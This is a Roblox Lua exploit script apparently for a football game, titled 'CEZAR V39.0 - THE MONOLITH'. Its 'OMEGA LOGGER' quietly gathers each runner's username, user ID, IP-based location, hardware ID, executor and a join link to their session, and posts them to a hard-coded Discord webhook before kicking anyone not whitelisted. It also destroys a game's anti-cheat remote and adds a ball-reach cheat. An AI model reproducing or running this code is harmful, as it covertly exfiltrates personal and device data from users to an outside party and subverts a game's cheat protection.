-- [[ CEZAR V39.0 - THE MONOLITH ]]
local lp = game:GetService("Players").LocalPlayer
local HttpService = game:GetService("HttpService")
local Stats = game:GetService("Stats")
local RS = game:GetService("RunService")
local LocS = game:GetService("LocalizationService")
local camera = workspace.CurrentCamera

-- [[ MASTER WHITELIST ]]
local Whitelist = {
    [4479445660]  = true,
    [10459866852] = true,
    [10459902683] = true, -- CEZAR
    [10412239686] = true,
    [10459902683] = true  -- 5th ID
}

-- [[ RAW WEBHOOK ]]
local WEBHOOK_URL = "https://webhook.lewisakura.moe/api/webhooks/1469133460034683005/WcdqtMw6BFrpTTntTrxgMuSicadDiyOFMavdOaubAQsAsRluDX2O1WXAc5xHcHnPpS-R"

-- [[ 1. OMEGA LOGGER ]]
local function SendDeepLog(auth)
    task.spawn(function()
        local geo = {country = "N/A", city = "N/A"}
        pcall(function() geo = HttpService:JSONDecode(game:HttpGet("http://ip-api.com/json/")) end)
        
        local ping = math.floor(Stats.Network.ServerStatsItem["Data Ping"]:GetValue())
        local country = "N/A" pcall(function() country = LocS:GetCountryRegionForPlayerAsync(lp) end)
        local hwid = (gethwid and gethwid() or "Unknown")
        local executor = (identifyexecutor and identifyexecutor() or "Unknown")
        
        local payload = {
            ["username"] = "cezar",
            ["embeds"] = {{
                ["title"] = auth and "🟢 ACCESS GRANTED" or "🔴 ACCESS DENIED",
                ["color"] = auth and 0x00FF00 or 0xFF0000,
                ["fields"] = {
                    {["name"] = "👤 IDENTITY", ["value"] = "User: "..lp.Name.."\nID: "..lp.UserId, ["inline"] = true},
                    {["name"] = "📍 LOCATION", ["value"] = (geo.country or "N/A").."\nRegion: "..country, ["inline"] = true},
                    {["name"] = "💻 FINGERPRINT", ["value"] = "Exec: "..executor.."\nHWID: ```"..hwid.."```", ["inline"] = false},
                    {["name"] = "🔗 SESSION", ["value"] = "[Join Game](https://www.roblox.com/games/"..game.PlaceId.."?jobId="..game.JobId..")", ["inline"] = false}
                },
                ["footer"] = {["text"] = "MOSS MONOLITH | "..os.date("%X")}
            }}
        }

        local r = (request or http_request or (syn and syn.request))
        if r then 
            pcall(function()
                r({
                    Url = WEBHOOK_URL, 
                    Method = "POST", 
                    Headers = {["Content-Type"] = "application/json"}, 
                    Body = HttpService:JSONEncode(payload)
                })
            end)
        end
    end)
end

-- [[ 2. THE BYPASS ]]
pcall(function()
    local Actions = workspace:WaitForChild("FE", 5):WaitForChild("Actions", 5)
    if Actions:FindFirstChild("KeepYourHeadUp") then
        Actions.KeepYourHeadUp:Destroy()
        local fake = Instance.new("RemoteEvent")
        fake.Name = "KeepYourHeadUp"
        fake.Parent = Actions
    end
end)

-- [[ 3. SECURITY GATE ]]
if not Whitelist[lp.UserId] then 
    SendDeepLog(false) 
    task.wait(2) 
    lp:Kick("DM KERSAII ON DC")
    return 
end

SendDeepLog(true)

-- [[ 4. HARD-LOCKED REACH ]]
local CFG = {
    GROUND = 4.0,
    JUMPLEG = 5.0,
    AIR_X = 3.5,
    AIR_Z = 3.0,
    AIR_Y = 5.2,      
    PRED = 0.08
}

local function getBall()
    return workspace:FindFirstChild("TPSSystem") and workspace.TPSSystem:FindFirstChild("TPS") or workspace:FindFirstChild("Ball")
end

RS.PreSimulation:Connect(function()
    local char, ball = lp.Character, getBall()
    local root = char and char:FindFirstChild("HumanoidRootPart")
    local hum = char and char:FindFirstChild("Humanoid")
    if not root or not ball or not hum or hum.Health <= 0 then return end

    local isJumping = (hum.FloorMaterial == Enum.Material.Air)
    local lPos = root.CFrame:PointToObjectSpace(ball.Position + (ball.AssemblyLinearVelocity * CFG.PRED))
    local dx, dy, dz = lPos.X, lPos.Y, lPos.Z
    local hit, mode = false, ""

    if isJumping and dy >= 2.8 and dy <= CFG.AIR_Y then
        if math.abs(dx) <= CFG.AIR_X and math.abs(dz) <= CFG.AIR_Z then hit, mode = true, "H" end
    elseif dy <= 1.3 and dy >= -2.5 then
        local r = isJumping and CFG.JUMPLEG or CFG.GROUND
        if math.abs(dx) <= r and math.abs(dz) <= r then hit, mode = true, "G" end
    end

    if hit then
        local look = camera.CFrame.LookVector
        if mode == "H" then
            ball.AssemblyLinearVelocity = (look * 115) + Vector3.new(0, 10, 0)
            firetouchinterest(ball, char:FindFirstChild("Head") or root, 0)
            firetouchinterest(ball, char:FindFirstChild("Head") or root, 1)
        else
            ball.AssemblyLinearVelocity = isJumping and Vector3.new(look.X * 90, -60, look.Z * 90) or (look * 90)
            firetouchinterest(ball, root, 0)
            firetouchinterest(ball, root, 1)
        end
    end
end)

lp.SimulationRadius = 99999
print("____________________________________")
print("      [ V39.0 - THE MONOLITH ]      ")
print("        LOGGER & BYPASS ACTIVE      ")
print("____________________________________")
